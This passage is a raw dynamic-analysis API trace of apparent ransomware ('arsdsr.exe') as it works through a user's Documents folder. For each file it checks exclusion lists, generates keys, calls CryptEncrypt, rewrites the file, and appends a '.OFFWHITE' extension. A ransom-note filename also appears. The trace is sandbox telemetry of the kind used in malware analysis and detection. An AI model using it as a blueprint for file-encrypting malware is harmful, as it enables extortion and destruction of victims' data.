lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e1fb7a0, ftCreationTime.dwHighDateTime=0x1d5dd8d, ftLastAccessTime.dwLowDateTime=0xdf38dd70, ftLastAccessTime.dwHighDateTime=0x1d5e730, ftLastWriteTime.dwLowDateTime=0xdf38dd70, ftLastWriteTime.dwHighDateTime=0x1d5e730, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="cDV0nF7Jj Uo2i92U", cAlternateFileName="CDV0NF~1")) returned 1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2=".") returned 1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2="..") returned 1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2="...") returned 1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2="windows") returned -1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2="$recycle.bin") returned 1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2="rsa") returned -1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2="ntuser.dat") returned -1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2="programdata") returned -1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2="appdata") returned 1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2="program files") returned -1 [0133.284] lstrcmpiW (lpString1="cDV0nF7Jj Uo2i92U", lpString2="program files (x86)") returned -1 [0133.284] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.284] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="cDV0nF7Jj Uo2i92U" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U" [0133.284] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\" [0133.284] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\" [0133.284] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\*.*" [0133.284] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e1fb7a0, ftCreationTime.dwHighDateTime=0x1d5dd8d, ftLastAccessTime.dwLowDateTime=0xdf38dd70, ftLastAccessTime.dwHighDateTime=0x1d5e730, ftLastWriteTime.dwLowDateTime=0xdf38dd70, ftLastWriteTime.dwHighDateTime=0x1d5e730, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName=".", cAlternateFileName="")) returned 0x544650 [0133.287] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0133.287] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e1fb7a0, ftCreationTime.dwHighDateTime=0x1d5dd8d, ftLastAccessTime.dwLowDateTime=0xdf38dd70, ftLastAccessTime.dwHighDateTime=0x1d5e730, ftLastWriteTime.dwLowDateTime=0xdf38dd70, ftLastWriteTime.dwHighDateTime=0x1d5e730, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="..", cAlternateFileName="")) returned 1 [0133.288] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0133.288] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0133.288] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92c84e70, ftCreationTime.dwHighDateTime=0x1d5e76d, ftLastAccessTime.dwLowDateTime=0x23e798c0, ftLastAccessTime.dwHighDateTime=0x1d5da35, ftLastWriteTime.dwLowDateTime=0x23e798c0, ftLastWriteTime.dwHighDateTime=0x1d5da35, nFileSizeHigh=0x0, nFileSizeLow=0x9cc5, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="Dt5iQGE SpB1e2.pdf", cAlternateFileName="DT5IQG~1.PDF")) returned 1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2=".") returned 1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="..") returned 1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="...") returned 1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="windows") returned -1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="$recycle.bin") returned 1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="rsa") returned -1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="ntuser.dat") returned -1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="programdata") returned -1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="appdata") returned 1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="program files") returned -1 [0133.288] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="program files (x86)") returned -1 [0133.288] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\" [0133.288] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\", lpString2="Dt5iQGE SpB1e2.pdf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf" [0133.288] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.288] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.288] PathFindExtensionW (pszPath="Dt5iQGE SpB1e2.pdf") returned=".pdf" [0133.288] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0133.288] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0133.288] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0133.288] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0133.288] lstrcmpiW (lpString1=".pdf", lpString2=".com") returned 1 [0133.288] lstrcmpiW (lpString1=".pdf", lpString2=".cpl") returned 1 [0133.288] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0133.288] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0133.289] lstrcmpiW (lpString1=".pdf", lpString2=".url") returned -1 [0133.289] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0133.289] lstrcmpiW (lpString1=".pdf", lpString2=".mp3") returned 1 [0133.289] lstrcmpiW (lpString1=".pdf", lpString2=".pif") returned -1 [0133.289] lstrcmpiW (lpString1=".pdf", lpString2=".mp4") returned 1 [0133.289] lstrcmpiW (lpString1=".pdf", lpString2=".OFFWHITE") returned 1 [0133.289] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0133.289] lstrcmpiW (lpString1="Dt5iQGE SpB1e2.pdf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.289] GetProcessHeap () returned 0x500000 [0133.289] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f738 [0133.289] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cdv0nf7jj uo2i92u\\dt5iqge spb1e2.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0133.291] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=40133) returned 1 [0133.291] GetProcessHeap () returned 0x500000 [0133.291] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.291] GetProcessHeap () returned 0x500000 [0133.291] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.291] GetProcessHeap () returned 0x500000 [0133.291] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.291] GetProcessHeap () returned 0x500000 [0133.291] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.291] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.291] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.291] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.291] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.291] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.291] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.291] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.291] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.291] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0133.292] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.292] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.292] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0133.292] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9cc5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.292] SetLastError (dwErrCode=0x0) [0133.292] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0133.295] GetLastError () returned 0x0 [0133.295] GetLastError () returned 0x0 [0133.295] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9dc5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.295] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0133.295] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9ec5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.295] WriteFile (in: hFile=0x21c, lpBuffer=0x53f738*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f738*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0133.296] GetProcessHeap () returned 0x500000 [0133.296] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x9cc5) returned 0x55a7b8 [0133.296] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.296] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x9cc5, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x9cc5, lpOverlapped=0x0) returned 1 [0133.298] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.298] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x9cc5, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x9cc5, lpOverlapped=0x0) returned 1 [0133.299] GetProcessHeap () returned 0x500000 [0133.299] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.299] CloseHandle (hObject=0x21c) returned 1 [0133.301] GetProcessHeap () returned 0x500000 [0133.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.301] GetProcessHeap () returned 0x500000 [0133.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.301] GetProcessHeap () returned 0x500000 [0133.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.301] GetProcessHeap () returned 0x500000 [0133.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.301] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf" [0133.301] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf.OFFWHITE" [0133.301] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cdv0nf7jj uo2i92u\\dt5iqge spb1e2.pdf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\Dt5iQGE SpB1e2.pdf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cdv0nf7jj uo2i92u\\dt5iqge spb1e2.pdf.offwhite")) returned 1 [0133.302] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34303110, ftCreationTime.dwHighDateTime=0x1d5e01b, ftLastAccessTime.dwLowDateTime=0xb550aca0, ftLastAccessTime.dwHighDateTime=0x1d5e72f, ftLastWriteTime.dwLowDateTime=0xb550aca0, ftLastWriteTime.dwHighDateTime=0x1d5e72f, nFileSizeHigh=0x0, nFileSizeLow=0x15802, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="eF Em.pps", cAlternateFileName="EFEM~1.PPS")) returned 1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2=".") returned 1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2="..") returned 1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2="...") returned 1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2="windows") returned -1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2="$recycle.bin") returned 1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2="rsa") returned -1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2="ntuser.dat") returned -1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2="programdata") returned -1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2="appdata") returned 1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2="program files") returned -1 [0133.302] lstrcmpiW (lpString1="eF Em.pps", lpString2="program files (x86)") returned -1 [0133.302] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\" [0133.302] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\", lpString2="eF Em.pps" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps" [0133.302] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.302] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.303] PathFindExtensionW (pszPath="eF Em.pps") returned=".pps" [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".exe") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".log") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".cab") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".cmd") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".com") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".cpl") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".url") returned -1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".ttf") returned -1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".mp3") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".pif") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".mp4") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".OFFWHITE") returned 1 [0133.303] lstrcmpiW (lpString1=".pps", lpString2=".msi") returned 1 [0133.303] lstrcmpiW (lpString1="eF Em.pps", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.303] GetProcessHeap () returned 0x500000 [0133.303] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f748 [0133.303] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cdv0nf7jj uo2i92u\\ef em.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0133.304] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=88066) returned 1 [0133.305] GetProcessHeap () returned 0x500000 [0133.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.305] GetProcessHeap () returned 0x500000 [0133.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.305] GetProcessHeap () returned 0x500000 [0133.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.305] GetProcessHeap () returned 0x500000 [0133.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.305] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.305] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.305] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.305] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.305] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.305] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.305] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.305] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.305] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0133.305] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.305] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.305] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0133.306] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15802, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.306] SetLastError (dwErrCode=0x0) [0133.306] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0133.308] GetLastError () returned 0x0 [0133.308] GetLastError () returned 0x0 [0133.308] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15902, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.308] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0133.308] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15a02, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.308] WriteFile (in: hFile=0x21c, lpBuffer=0x53f748*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f748*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0133.308] GetProcessHeap () returned 0x500000 [0133.308] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15802) returned 0x55a7b8 [0133.308] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.308] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x15802, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x15802, lpOverlapped=0x0) returned 1 [0133.313] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.314] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x15802, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x15802, lpOverlapped=0x0) returned 1 [0133.314] GetProcessHeap () returned 0x500000 [0133.314] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.314] CloseHandle (hObject=0x21c) returned 1 [0133.317] GetProcessHeap () returned 0x500000 [0133.317] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.317] GetProcessHeap () returned 0x500000 [0133.317] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.317] GetProcessHeap () returned 0x500000 [0133.317] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.317] GetProcessHeap () returned 0x500000 [0133.317] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.317] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps" [0133.317] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps.OFFWHITE" [0133.317] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cdv0nf7jj uo2i92u\\ef em.pps"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\eF Em.pps.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cdv0nf7jj uo2i92u\\ef em.pps.offwhite")) returned 1 [0133.318] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, 